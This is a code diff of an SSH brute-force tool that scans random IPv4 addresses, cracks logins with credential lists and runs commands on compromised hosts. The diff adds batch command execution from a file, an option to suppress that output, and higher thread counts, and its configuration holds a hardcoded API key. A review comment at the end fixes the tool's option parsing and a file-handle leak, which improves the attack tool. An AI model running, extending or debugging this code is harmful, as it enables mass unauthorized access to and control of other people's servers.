9898
9999 -r <num> - generate <num> random ipv4 addresses, check for open
100100 sshd port and crack for login (only with -m option!)
101- -c <cmd> - execute this <cmd> on host if login was cracked
101+ -c <file|cmd> - read commands from file (line by line) or execute a
102+ single command on host if login was cracked
103+ -N - do not output ssh command results
102104 -u <user> - single username (default: root)
103105 -U <file> - list of usernames
104106 -p - single password (default: root)
105107 -P <file> - list of passwords
106108 -C <file> - list of user:pass combination
107- -x <num> - num threads for parallel host crack (default: 20 )
108- -S <num> - num threads for parallel service crack (default: 20 )
109- -X <num> - num threads for parallel login crack (default: 20 )
109+ -x <num> - num threads for parallel host crack (default: 50 )
110+ -S <num> - num threads for parallel service crack (default: 1 )
111+ -X <num> - num threads for parallel login crack (default: 5 )
110112 -B <num> - num threads for parallel banner grabbing (default: 70)
111113 -T <sec> - num sec for auth and connect timeout (default: 5s)
112114 -R <sec> - num sec for (banner) read timeout (default: 3s)
154156 'sho_lim' : None ,
155157 'sho_key' : 'Pp1oDSiavzKQJSsRgdzuxFJs8PQXzBL9' ,
156158 'cmd' : None ,
159+ 'cmd_no_out' : False ,
157160 'user' : 'root' ,
158161 'pass' : 'root' ,
159- 'hthreads' : 20 ,
160- 'sthreads' : 20 ,
161- 'lthreads' : 20 ,
162+ 'hthreads' : 50 ,
163+ 'sthreads' : 1 ,
164+ 'lthreads' : 5 ,
162165 'bthreads' : 70 ,
163166 'ctimeout' : 5 ,
164167 'rtimeout' : 3 ,
@@ -223,7 +226,7 @@ def parse_cmdline(cmdline):
223226
224227 try :
225228 _opts , _args = getopt .getopt (cmdline ,
226- 'h:l:m:s:b:r:c:u:U:p:P:C:x:S:X:B:T:R:o:evVH' )
229+ 'h:l:m:s:b:r:c:N: u:U:p:P:C:x:S:X:B:T:R:o:evVH' )
227230 for o , a in _opts :
228231 if o == '-h' :
229232 opts ['targets' ] = parse_target (a )
@@ -239,6 +242,8 @@ def parse_cmdline(cmdline):
239242 opts ['random' ] = int (a )
240243 if o == '-c' :
241244 opts ['cmd' ] = a
245+ if o == '-N' :
246+ opts ['cmd_no_out' ] = True
242247 if o == '-u' :
243248 opts ['user' ] = a
244249 if o == '-U' :
@@ -405,11 +410,25 @@ def crack_login(host, port, username, password):
405410 else :
406411 log (f'found a login (check { opts ["logfile" ]} )' , _type = 'good' )
407412 if opts ['cmd' ]:
408- log ('sending your ssh command' , 'info' )
409- stdin , stdout , stderr = cli .exec_command (opts ['cmd' ], timeout = 2 )
410- log ('ssh command results' , 'good' )
411- for line in stdout .readlines ():
412- log (line )
413+ if os .path .isfile (opts ['cmd' ]):
414+ log (f"sending ssh commands from { opts ['cmd' ]} " , 'info' )
415+ with open (opts ['cmd' ], 'r' , encoding = 'latin-1' ) as _file :
416+ for line in _file :
417+ stdin , stdout , stderr = cli .exec_command (line , timeout = 2 )
418+ if not opts ['cmd_no_out' ]:
419+ rl = stdout .readlines ()
420+ if len (rl ) > 0 :
421+ log (f'ssh command result for: \' { line .rstrip ()} \' ' , 'good' ,
422+ pre_esc = '\n ' )
423+ for line in rl :
424+ log (f'{ line } ' )
425+ else :
426+ log ('sending your single ssh command line' , 'info' )
427+ if not opts ['cmd_no_out' ]:
428+ stdin , stdout , stderr = cli .exec_command (opts ['cmd' ], timeout = 2 )
429+ log (f"ssh command results for \' { opts ['cmd' ].rstrip ()} \' " , 'good' )
430+ for line in stdout .readlines ():
431+ log (line )
413432 return SUCCESS
414433 except paramiko .AuthenticationException as err :
415434 if opts ['verbose' ]:
@@ -463,6 +482,7 @@ def run_threads(host, ports, val='single'):
463482
464483 if 'userlist' in opts and 'passlist' in opts :
465484 for u in uf :
485+ pf = open (opts ['passlist' ], 'r' , encoding = 'latin-1' )
466486 for p in pf :
467487 exe .submit (crack_login , host , port , u .rstrip (), p .rstrip ())
468488
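Review bot: The new getopt string in parse_cmdline declares the option as `N:` (with a stray space after it), so getopt expects a value for `-N`, while the usage text documents it as a bare flag and the handler never reads `a`. As written, the token following `-N` on the command line would be consumed as its argument instead of being parsed as the next option. Dropping the colon and the space, `'h:l:m:s:b:r:c:Nu:U:p:P:C:x:S:X:B:T:R:o:evVH'`, brings the parser in line with the documented behaviour. Separately, the line added in run_threads, `pf = open(opts['passlist'], 'r', encoding='latin-1')`, reopens the password list once per username and never closes it; wrapping the inner loop in `with open(opts['passlist'], 'r', encoding='latin-1') as pf:` would release each handle. Both functions begin and end outside the visible hunks, so this is based only on the lines shown.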